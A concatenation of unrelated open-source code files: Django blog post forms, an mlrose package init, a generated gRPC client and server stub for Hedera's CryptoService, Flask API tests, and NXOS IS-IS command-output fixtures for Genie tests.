'title': forms.TextInput(attrs={'class': 'form-control'}),
'title_tag': forms.TextInput(
attrs={'class': 'form-control', 'placeholder': "This appear on the tab of your browser"}),
'author': forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'username', 'value': '', 'id': 'gokul',
'type': 'hidden'}),
'body': forms.Textarea(attrs={'class': 'form-control'}),
'snippet': forms.Textarea(attrs={'class': 'form-control'}),
}
class Editform(forms.ModelForm):
class Meta:
model = Post
fields = ('title', 'title_tag', 'body', 'snippet')
widgets = {
'title': forms.TextInput(attrs={'class': 'form-control'}),
'title_tag': forms.TextInput(
attrs={'class': 'form-control', 'placeholder': "This appear on the tab of your browser"}),
'body': forms.Textarea(attrs={'class': 'form-control'}),
'snippet': forms.Textarea(attrs={'class': 'form-control'}),
}
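# A minimal usage sketch (hypothetical view and template name; the form calls
# below are standard Django ModelForm methods):
#
#     from django.shortcuts import render, redirect
#
#     def add_post(request):
#         form = Postform(request.POST or None)
#         if request.method == 'POST' and form.is_valid():
#             form.save()  # persists a new Post via the ModelForm
#             return redirect('home')
#         return render(request, 'add_post.html', {'form': form})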
[dataset metadata omitted: quality-signal columns for forms.py, then the record header for the next file: mlrose_hiive/samples/__init__.py from sareini/mlrose, BSD-3-Clause, 196 bytes, 63 stars]
""" Classes for running optimization problems."""
# Author: Andrew Rollings
# License: BSD 3 clause
from .synthetic_data import SyntheticData
from .synthetic_data import (plot_synthetic_dataset)
[dataset metadata omitted: quality-signal columns for samples/__init__.py, then the record header for the next file: src/hedera_proto/crypto_service_pb2_grpc.py from HbarStudio/hedera-protobufs-python, Apache-2.0, 23,108 bytes]
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
import query_pb2 as query__pb2
import response_pb2 as response__pb2
import transaction_pb2 as transaction__pb2
import transaction_response_pb2 as transaction__response__pb2
class CryptoServiceStub(object):
"""*
Transactions and queries for the Crypto Service
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.createAccount = channel.unary_unary(
'/proto.CryptoService/createAccount',
request_serializer=transaction__pb2.Transaction.SerializeToString,
response_deserializer=transaction__response__pb2.TransactionResponse.FromString,
)
self.updateAccount = channel.unary_unary(
'/proto.CryptoService/updateAccount',
request_serializer=transaction__pb2.Transaction.SerializeToString,
response_deserializer=transaction__response__pb2.TransactionResponse.FromString,
)
self.cryptoTransfer = channel.unary_unary(
'/proto.CryptoService/cryptoTransfer',
request_serializer=transaction__pb2.Transaction.SerializeToString,
response_deserializer=transaction__response__pb2.TransactionResponse.FromString,
)
self.cryptoDelete = channel.unary_unary(
'/proto.CryptoService/cryptoDelete',
request_serializer=transaction__pb2.Transaction.SerializeToString,
response_deserializer=transaction__response__pb2.TransactionResponse.FromString,
)
self.addLiveHash = channel.unary_unary(
'/proto.CryptoService/addLiveHash',
request_serializer=transaction__pb2.Transaction.SerializeToString,
response_deserializer=transaction__response__pb2.TransactionResponse.FromString,
)
self.deleteLiveHash = channel.unary_unary(
'/proto.CryptoService/deleteLiveHash',
request_serializer=transaction__pb2.Transaction.SerializeToString,
response_deserializer=transaction__response__pb2.TransactionResponse.FromString,
)
self.getLiveHash = channel.unary_unary(
'/proto.CryptoService/getLiveHash',
request_serializer=query__pb2.Query.SerializeToString,
response_deserializer=response__pb2.Response.FromString,
)
self.getAccountRecords = channel.unary_unary(
'/proto.CryptoService/getAccountRecords',
request_serializer=query__pb2.Query.SerializeToString,
response_deserializer=response__pb2.Response.FromString,
)
self.cryptoGetBalance = channel.unary_unary(
'/proto.CryptoService/cryptoGetBalance',
request_serializer=query__pb2.Query.SerializeToString,
response_deserializer=response__pb2.Response.FromString,
)
self.getAccountInfo = channel.unary_unary(
'/proto.CryptoService/getAccountInfo',
request_serializer=query__pb2.Query.SerializeToString,
response_deserializer=response__pb2.Response.FromString,
)
self.getTransactionReceipts = channel.unary_unary(
'/proto.CryptoService/getTransactionReceipts',
request_serializer=query__pb2.Query.SerializeToString,
response_deserializer=response__pb2.Response.FromString,
)
self.getFastTransactionRecord = channel.unary_unary(
'/proto.CryptoService/getFastTransactionRecord',
request_serializer=query__pb2.Query.SerializeToString,
response_deserializer=response__pb2.Response.FromString,
)
self.getTxRecordByTxID = channel.unary_unary(
'/proto.CryptoService/getTxRecordByTxID',
request_serializer=query__pb2.Query.SerializeToString,
response_deserializer=response__pb2.Response.FromString,
)
self.getStakersByAccountID = channel.unary_unary(
'/proto.CryptoService/getStakersByAccountID',
request_serializer=query__pb2.Query.SerializeToString,
response_deserializer=response__pb2.Response.FromString,
)
class CryptoServiceServicer(object):
"""*
Transactions and queries for the Crypto Service
"""
def createAccount(self, request, context):
"""*
Creates a new account by submitting the transaction
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def updateAccount(self, request, context):
"""*
Updates an account by submitting the transaction
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def cryptoTransfer(self, request, context):
"""*
Initiates a transfer by submitting the transaction
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def cryptoDelete(self, request, context):
"""*
Deletes an account by submitting the transaction
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def addLiveHash(self, request, context):
"""*
(NOT CURRENTLY SUPPORTED) Adds a livehash
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def deleteLiveHash(self, request, context):
"""*
(NOT CURRENTLY SUPPORTED) Deletes a livehash
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def getLiveHash(self, request, context):
"""*
(NOT CURRENTLY SUPPORTED) Retrieves a livehash for an account
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def getAccountRecords(self, request, context):
"""*
Returns all transactions in the last 180s of consensus time for which the given account was
the effective payer <b>and</b> network property <tt>ledger.keepRecordsInState</tt> was
<tt>true</tt>.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def cryptoGetBalance(self, request, context):
"""*
Retrieves the balance of an account
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def getAccountInfo(self, request, context):
"""*
Retrieves the metadata of an account
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def getTransactionReceipts(self, request, context):
"""*
Retrieves the latest receipt for a transaction that is either awaiting consensus, or reached
consensus in the last 180 seconds
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def getFastTransactionRecord(self, request, context):
"""*
(NOT CURRENTLY SUPPORTED) Returns the records of transactions recently funded by an account
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def getTxRecordByTxID(self, request, context):
"""*
Retrieves the record of a transaction that is either awaiting consensus, or reached consensus
in the last 180 seconds
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def getStakersByAccountID(self, request, context):
"""*
(NOT CURRENTLY SUPPORTED) Retrieves the stakers for a node by account id
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_CryptoServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'createAccount': grpc.unary_unary_rpc_method_handler(
servicer.createAccount,
request_deserializer=transaction__pb2.Transaction.FromString,
response_serializer=transaction__response__pb2.TransactionResponse.SerializeToString,
),
'updateAccount': grpc.unary_unary_rpc_method_handler(
servicer.updateAccount,
request_deserializer=transaction__pb2.Transaction.FromString,
response_serializer=transaction__response__pb2.TransactionResponse.SerializeToString,
),
'cryptoTransfer': grpc.unary_unary_rpc_method_handler(
servicer.cryptoTransfer,
request_deserializer=transaction__pb2.Transaction.FromString,
response_serializer=transaction__response__pb2.TransactionResponse.SerializeToString,
),
'cryptoDelete': grpc.unary_unary_rpc_method_handler(
servicer.cryptoDelete,
request_deserializer=transaction__pb2.Transaction.FromString,
response_serializer=transaction__response__pb2.TransactionResponse.SerializeToString,
),
'addLiveHash': grpc.unary_unary_rpc_method_handler(
servicer.addLiveHash,
request_deserializer=transaction__pb2.Transaction.FromString,
response_serializer=transaction__response__pb2.TransactionResponse.SerializeToString,
),
'deleteLiveHash': grpc.unary_unary_rpc_method_handler(
servicer.deleteLiveHash,
request_deserializer=transaction__pb2.Transaction.FromString,
response_serializer=transaction__response__pb2.TransactionResponse.SerializeToString,
),
'getLiveHash': grpc.unary_unary_rpc_method_handler(
servicer.getLiveHash,
request_deserializer=query__pb2.Query.FromString,
response_serializer=response__pb2.Response.SerializeToString,
),
'getAccountRecords': grpc.unary_unary_rpc_method_handler(
servicer.getAccountRecords,
request_deserializer=query__pb2.Query.FromString,
response_serializer=response__pb2.Response.SerializeToString,
),
'cryptoGetBalance': grpc.unary_unary_rpc_method_handler(
servicer.cryptoGetBalance,
request_deserializer=query__pb2.Query.FromString,
response_serializer=response__pb2.Response.SerializeToString,
),
'getAccountInfo': grpc.unary_unary_rpc_method_handler(
servicer.getAccountInfo,
request_deserializer=query__pb2.Query.FromString,
response_serializer=response__pb2.Response.SerializeToString,
),
'getTransactionReceipts': grpc.unary_unary_rpc_method_handler(
servicer.getTransactionReceipts,
request_deserializer=query__pb2.Query.FromString,
response_serializer=response__pb2.Response.SerializeToString,
),
'getFastTransactionRecord': grpc.unary_unary_rpc_method_handler(
servicer.getFastTransactionRecord,
request_deserializer=query__pb2.Query.FromString,
response_serializer=response__pb2.Response.SerializeToString,
),
'getTxRecordByTxID': grpc.unary_unary_rpc_method_handler(
servicer.getTxRecordByTxID,
request_deserializer=query__pb2.Query.FromString,
response_serializer=response__pb2.Response.SerializeToString,
),
'getStakersByAccountID': grpc.unary_unary_rpc_method_handler(
servicer.getStakersByAccountID,
request_deserializer=query__pb2.Query.FromString,
response_serializer=response__pb2.Response.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'proto.CryptoService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
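# Illustrative sketch: wiring a servicer into a server. A real implementation
# would subclass CryptoServiceServicer and override the methods above; the
# port number is a placeholder.
def _example_serve(port=50211):
    from concurrent import futures
    server = grpc.server(futures.ThreadPoolExecutor(max_workers=4))
    add_CryptoServiceServicer_to_server(CryptoServiceServicer(), server)
    server.add_insecure_port('[::]:%d' % port)
    server.start()
    server.wait_for_termination()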
# This class is part of an EXPERIMENTAL API.
class CryptoService(object):
"""*
Transactions and queries for the Crypto Service
"""
@staticmethod
def createAccount(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.CryptoService/createAccount',
transaction__pb2.Transaction.SerializeToString,
transaction__response__pb2.TransactionResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def updateAccount(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.CryptoService/updateAccount',
transaction__pb2.Transaction.SerializeToString,
transaction__response__pb2.TransactionResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def cryptoTransfer(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.CryptoService/cryptoTransfer',
transaction__pb2.Transaction.SerializeToString,
transaction__response__pb2.TransactionResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def cryptoDelete(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.CryptoService/cryptoDelete',
transaction__pb2.Transaction.SerializeToString,
transaction__response__pb2.TransactionResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def addLiveHash(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.CryptoService/addLiveHash',
transaction__pb2.Transaction.SerializeToString,
transaction__response__pb2.TransactionResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def deleteLiveHash(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.CryptoService/deleteLiveHash',
transaction__pb2.Transaction.SerializeToString,
transaction__response__pb2.TransactionResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def getLiveHash(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.CryptoService/getLiveHash',
query__pb2.Query.SerializeToString,
response__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def getAccountRecords(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.CryptoService/getAccountRecords',
query__pb2.Query.SerializeToString,
response__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def cryptoGetBalance(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.CryptoService/cryptoGetBalance',
query__pb2.Query.SerializeToString,
response__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def getAccountInfo(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.CryptoService/getAccountInfo',
query__pb2.Query.SerializeToString,
response__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def getTransactionReceipts(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.CryptoService/getTransactionReceipts',
query__pb2.Query.SerializeToString,
response__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def getFastTransactionRecord(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.CryptoService/getFastTransactionRecord',
query__pb2.Query.SerializeToString,
response__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def getTxRecordByTxID(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.CryptoService/getTxRecordByTxID',
query__pb2.Query.SerializeToString,
response__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def getStakersByAccountID(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.CryptoService/getStakersByAccountID',
query__pb2.Query.SerializeToString,
response__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
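# Illustrative sketch of the EXPERIMENTAL one-shot API above: issue a balance
# query without managing a channel yourself. The target and the (empty) Query
# payload are placeholders; a real caller would populate the query first.
def _example_get_balance(target='localhost:50211'):
    query = query__pb2.Query()
    return CryptoService.cryptoGetBalance(query, target, insecure=True)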
# ---- tests/test_api_general.py | Toxe/python-flask-rest-jwt | MIT ----
def test_api_slash_request_forbidden(client):
assert client.get("/").status_code == 404
def test_api_root_request_forbidden(client):
assert client.get("/api").status_code == 404
assert client.get("/api/").status_code == 404
# ---- pkgs/ops-pkg/src/genie/libs/ops/isis/nxos/tests/isis_output.py | jbronikowski/genielibs | Apache-2.0 ----
"""
Isis Genie Ops Object Outputs for NXOS.
"""
class IsisOutput(object):
showIsisVrfAll = '''\
show isis vrf all
ISIS process : test
Instance number : 1
UUID: 1090519320
Process ID 1326
VRF: default
System ID : 7777.7777.7777 IS-Type : L1-L2
SAP : 412 Queue Handle : 15
Maximum LSP MTU: 1492
Stateful HA enabled
Graceful Restart enabled. State: Inactive
Last graceful restart status : none
Start-Mode Complete
BFD IPv4 is globally disabled for ISIS process: test
BFD IPv6 is globally disabled for ISIS process: test
Topology-mode is Multitopology
Metric-style : advertise(wide), accept(narrow, wide)
Area address(es) :
49.0002
Process is up and running
VRF ID: 1
Stale routes during non-graceful controlled restart
Enable resolution of L3->L2 address for ISIS adjacency
SR IPv4 is not configured and disabled for ISIS process: test
SR IPv6 is not configured and disabled for ISIS process: test
Interfaces supported by IS-IS :
loopback0
Ethernet1/1
Ethernet1/2
Ethernet1/3
Ethernet1/4
Topology : 0
Address family IPv4 unicast :
Number of interface : 5
Distance : 115
Address family IPv6 unicast :
Number of interface : 0
Distance : 115
Topology : 2
Address family IPv6 unicast :
Number of interface : 5
Distance : 115
Level1
No auth type and keychain
Auth check set
Level2
No auth type and keychain
Auth check set
L1 Next SPF: 00:00:06
L2 Next SPF: 00:00:02
ISIS process : test
Instance number : 1
UUID: 1090519320
Process ID 1326
VRF: VRF1
System ID : 7777.7777.7777 IS-Type : L1-L2
SAP : 412 Queue Handle : 15
Maximum LSP MTU: 1492
Stateful HA enabled
Graceful Restart enabled. State: Inactive
Last graceful restart status : none
Start-Mode Complete
BFD IPv4 is globally disabled for ISIS process: test
BFD IPv6 is globally disabled for ISIS process: test
Topology-mode is Multitopology
Metric-style : advertise(wide), accept(narrow, wide)
Area address(es) :
49.0002
Process is up and running
VRF ID: 3
Stale routes during non-graceful controlled restart
Enable resolution of L3->L2 address for ISIS adjacency
SR IPv4 is not configured and disabled for ISIS process: test
SR IPv6 is not configured and disabled for ISIS process: test
Interfaces supported by IS-IS :
loopback1
Ethernet1/5
Topology : 0
Address family IPv4 unicast :
Number of interface : 2
Distance : 115
Address family IPv6 unicast :
Number of interface : 0
Distance : 115
Topology : 2
Address family IPv6 unicast :
Number of interface : 2
Distance : 115
Level1
No auth type and keychain
Auth check set
Level2
No auth type and keychain
Auth check set
L1 Next SPF: Inactive
L2 Next SPF: 00:00:05
'''
showIsisInterfaceVrfAll = '''\
show isis interface vrf all
IS-IS process: test VRF: default
loopback0, Interface status: protocol-up/link-up/admin-up
IP address: 7.7.7.7, IP subnet: 7.7.7.7/32
IPv6 address:
2001:db8:7:7:7::7/128 [VALID]
IPv6 subnet: 2001:db8:7:7:7::7/128
IPv6 link-local address: fe80::5c00:40ff:fe06:0
Level1
No auth type and keychain
Auth check set
Level2
No auth type and keychain
Auth check set
Index: 0x0001, Local Circuit ID: 0x01, Circuit Type: L1-2
BFD IPv4 is locally disabled for Interface loopback0
BFD IPv6 is locally disabled for Interface loopback0
MTR is enabled
Level Metric
1 1
2 1
Topologies enabled:
L MT Metric MetricCfg Fwdng IPV4-MT IPV4Cfg IPV6-MT IPV6Cfg
1 0 1 no UP UP yes DN yes
1 2 1 no UP DN no UP yes
2 0 1 no UP UP yes DN yes
2 2 1 no UP DN no UP yes
Ethernet1/1, Interface status: protocol-up/link-up/admin-up
IP address: 10.5.7.7, IP subnet: 10.5.7.0/24
IPv6 address:
2001:db8:10:5:7::7/64 [VALID]
IPv6 subnet: 2001:db8:10:5::/64
IPv6 link-local address: fe80::5c00:40ff:fe06:7
Level1
No auth type and keychain
Auth check set
Level2
No auth type and keychain
Auth check set
Index: 0x0002, Local Circuit ID: 0x01, Circuit Type: L1-2
BFD IPv4 is locally disabled for Interface Ethernet1/1
BFD IPv6 is locally disabled for Interface Ethernet1/1
MTR is enabled
Passive level: level-1-2
LSP interval: 33 ms, MTU: 1500
Level-1 Designated IS: R5
Level-2 Designated IS: R5
Level Metric-0 Metric-2 CSNP Next CSNP Hello Multi Next IIH
1 40 40 10 00:00:02 10 3 00:00:05
2 40 40 10 00:00:08 10 3 00:00:05
Level Adjs AdjsUp Pri Circuit ID Since
1 1 1 64 R5.03 1w0d
2 1 1 64 R5.03 1w0d
Topologies enabled:
L MT Metric MetricCfg Fwdng IPV4-MT IPV4Cfg IPV6-MT IPV6Cfg
1 0 40 no UP UP yes DN yes
1 2 40 no UP DN no UP yes
2 0 40 no UP UP yes DN yes
2 2 40 no UP DN no UP yes
Ethernet1/2, Interface status: protocol-up/link-up/admin-up
IP address: 10.6.7.7, IP subnet: 10.6.7.0/24
IPv6 address:
2001:db8:10:6:7::7/64 [VALID]
IPv6 subnet: 2001:db8:10:6::/64
IPv6 link-local address: fe80::5c00:40ff:fe06:7
Level1
No auth type and keychain
Auth check set
Level2
No auth type and keychain
Auth check set
Index: 0x0003, Local Circuit ID: 0x02, Circuit Type: L1
BFD IPv4 is locally disabled for Interface Ethernet1/2
BFD IPv6 is locally disabled for Interface Ethernet1/2
MTR is enabled
LSP interval: 33 ms, MTU: 1500
Level-1 Designated IS: R7
Level Metric-0 Metric-2 CSNP Next CSNP Hello Multi Next IIH
1 40 40 10 0.788413 3 3 0.589815
2 40 40 10 Inactive 10 3 Inactive
Level Adjs AdjsUp Pri Circuit ID Since
1 1 1 64 R7.02 * 1w0d
2 0 0 64 0000.0000.0000.00 never
Topologies enabled:
L MT Metric MetricCfg Fwdng IPV4-MT IPV4Cfg IPV6-MT IPV6Cfg
1 0 40 no UP UP yes DN yes
1 2 40 no UP DN no UP yes
2 0 40 no UP DN no DN no
2 2 40 no UP DN no DN no
Ethernet1/3, Interface status: protocol-up/link-up/admin-up
IP address: 10.7.8.7, IP subnet: 10.7.8.0/24
IPv6 address:
2001:db8:10:7:8::7/64 [VALID]
IPv6 subnet: 2001:db8:10:7::/64
IPv6 link-local address: fe80::5c00:40ff:fe06:7
Level1
No auth type and keychain
Auth check set
Level2
No auth type and keychain
Auth check set
Index: 0x0004, Local Circuit ID: 0x03, Circuit Type: L2
BFD IPv4 is locally disabled for Interface Ethernet1/3
BFD IPv6 is locally disabled for Interface Ethernet1/3
MTR is enabled
LSP interval: 33 ms, MTU: 1500
Level-2 Designated IS: R8
Level Metric-0 Metric-2 CSNP Next CSNP Hello Multi Next IIH
1 40 40 10 Inactive 10 3 Inactive
2 40 40 10 00:00:05 10 3 00:00:04
Level Adjs AdjsUp Pri Circuit ID Since
1 0 0 64 0000.0000.0000.00 never
2 1 1 64 R8.01 1w0d
Topologies enabled:
L MT Metric MetricCfg Fwdng IPV4-MT IPV4Cfg IPV6-MT IPV6Cfg
1 0 40 no UP DN no DN no
1 2 40 no UP DN no DN no
2 0 40 no UP UP yes DN yes
2 2 40 no UP DN no UP yes
Ethernet1/4, Interface status: protocol-up/link-up/admin-up
IP address: 10.7.9.7, IP subnet: 10.7.9.0/24
IPv6 address:
2001:db8:10:77:9::7/64 [VALID]
IPv6 subnet: 2001:db8:10:77::/64
IPv6 link-local address: fe80::5c00:40ff:fe06:7
Level1
No auth type and keychain
Auth check set
Level2
No auth type and keychain
Auth check set
Index: 0x0005, Local Circuit ID: 0x04, Circuit Type: L1-2
BFD IPv4 is locally disabled for Interface Ethernet1/4
BFD IPv6 is locally disabled for Interface Ethernet1/4
MTR is enabled
LSP interval: 33 ms, MTU: 1500
Level-2 Designated IS: R9
Level Metric-0 Metric-2 CSNP Next CSNP Hello Multi Next IIH
1 40 40 10 Inactive 10 3 00:00:04
2 40 40 10 00:00:03 10 3 0.911618
Level Adjs AdjsUp Pri Circuit ID Since
1 0 0 64 R7.04 never
2 1 1 64 R9.01 1w0d
Topologies enabled:
L MT Metric MetricCfg Fwdng IPV4-MT IPV4Cfg IPV6-MT IPV6Cfg
1 0 40 no UP UP yes DN yes
1 2 40 no UP DN no UP yes
2 0 40 no UP UP yes DN yes
2 2 40 no UP DN no UP yes
IS-IS process: test VRF: VRF1
loopback1, Interface status: protocol-up/link-up/admin-up
IP address: 77.77.77.77, IP subnet: 77.77.77.77/32
IPv6 address:
2001:db8:77:77:77::77/128 [VALID]
IPv6 subnet: 2001:db8:77:77:77::77/128
IPv6 link-local address: fe80::5c00:40ff:fe06:0
Level1
No auth type and keychain
Auth check set
Level2
No auth type and keychain
Auth check set
Index: 0x0002, Local Circuit ID: 0x01, Circuit Type: L1-2
BFD IPv4 is locally disabled for Interface loopback1
BFD IPv6 is locally disabled for Interface loopback1
MTR is enabled
Level Metric
1 1
2 1
Topologies enabled:
L MT Metric MetricCfg Fwdng IPV4-MT IPV4Cfg IPV6-MT IPV6Cfg
1 0 1 no UP UP yes DN yes
1 2 1 no UP DN no UP yes
2 0 1 no UP UP yes DN yes
2 2 1 no UP DN no UP yes
Ethernet1/5, Interface status: protocol-up/link-up/admin-up
IP address: 20.2.7.7, IP subnet: 20.2.7.0/24
IPv6 address:
2001:db8:20:2:7::7/64 [VALID]
IPv6 subnet: 2001:db8:20:2::/64
IPv6 link-local address: fe80::5c00:40ff:fe06:7
Level1
No auth type and keychain
Auth check set
Level2
No auth type and keychain
Auth check set
Index: 0x0001, Local Circuit ID: 0x01, Circuit Type: L1-2
BFD IPv4 is locally disabled for Interface Ethernet1/5
BFD IPv6 is locally disabled for Interface Ethernet1/5
MTR is enabled
LSP interval: 33 ms, MTU: 1500
Level-2 Designated IS: R2
Level Metric-0 Metric-2 CSNP Next CSNP Hello Multi Next IIH
1 40 40 10 Inactive 10 3 00:00:02
2 40 40 10 00:00:04 10 3 00:00:08
Level Adjs AdjsUp Pri Circuit ID Since
1 0 0 64 R7.01 never
2 1 1 64 R2.01 1w0d
Topologies enabled:
L MT Metric MetricCfg Fwdng IPV4-MT IPV4Cfg IPV6-MT IPV6Cfg
1 0 40 no UP UP yes DN yes
1 2 40 no UP DN no UP yes
2 0 40 no UP UP yes DN yes
2 2 40 no UP DN no UP yes
'''
showIsisAdjacencyVrfAll = '''\
show isis adjacency vrf all
IS-IS process: test VRF: default
IS-IS adjacency database:
Legend: '!': No AF level connectivity in given topology
System ID SNPA Level State Hold Time Interface
R5 fa16.3ed0.46fc 1 UP 00:00:08 Ethernet1/1
R5 fa16.3ed0.46fc 2 UP 00:00:09 Ethernet1/1
R6 5e00.4005.0007 1 UP 00:00:30 Ethernet1/2
R8 fa16.3eed.aa40 2 UP 00:00:08 Ethernet1/3
R9 fa16.3e06.ce8d 2 UP 00:00:09 Ethernet1/4
IS-IS process: test VRF: VRF1
IS-IS adjacency database:
Legend: '!': No AF level connectivity in given topology
System ID SNPA Level State Hold Time Interface
R2 fa16.3e63.eab0 2 UP 00:00:09 Ethernet1/5
'''
showIsisHostnameDetailVrfAll = '''\
show isis hostname detail vrf all
IS-IS Process: test dynamic hostname table VRF: default
Level LSP ID Dynamic hostname
2 2222.2222.2222.00-00 R2
1 3333.3333.3333.00-00 R3
2 3333.3333.3333.00-00 R3
1 4444.4444.4444.00-00 R4
1 5555.5555.5555.00-00 R5
2 5555.5555.5555.00-00 R5
1 6666.6666.6666.00-00 R6
1 7777.7777.7777.00-00* R7
2 7777.7777.7777.00-00* R7
2 8888.8888.8888.00-00 R8
2 9999.9999.9999.00-00 R9
IS-IS Process: test dynamic hostname table VRF: VRF1
Level LSP ID Dynamic hostname
2 2222.2222.2222.00-00 R2
1 7777.7777.7777.00-00* R7
2 7777.7777.7777.00-00* R7
'''
showIsisDatabaseDetail = '''\
show isis database detail
IS-IS Process: test LSP database VRF: default
IS-IS Level-1 Link State Database
LSPID Seq Number Checksum Lifetime A/P/O/T
R3.00-00 0x00000354 0xD12B 712 1/0/0/3
Instance : 0x0000034F
Area Address : 49.0002
Extended IS : R3.01 Metric : 10
Extended IS : R4.03 Metric : 10
Extended IS : R3.05 Metric : 10
NLPID : 0xCC 0x8E
IP Address : 3.3.3.3
Extended IP : 3.3.3.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.2.3.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.3.4.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.3.5.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.3.6.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Hostname : R3 Length : 2
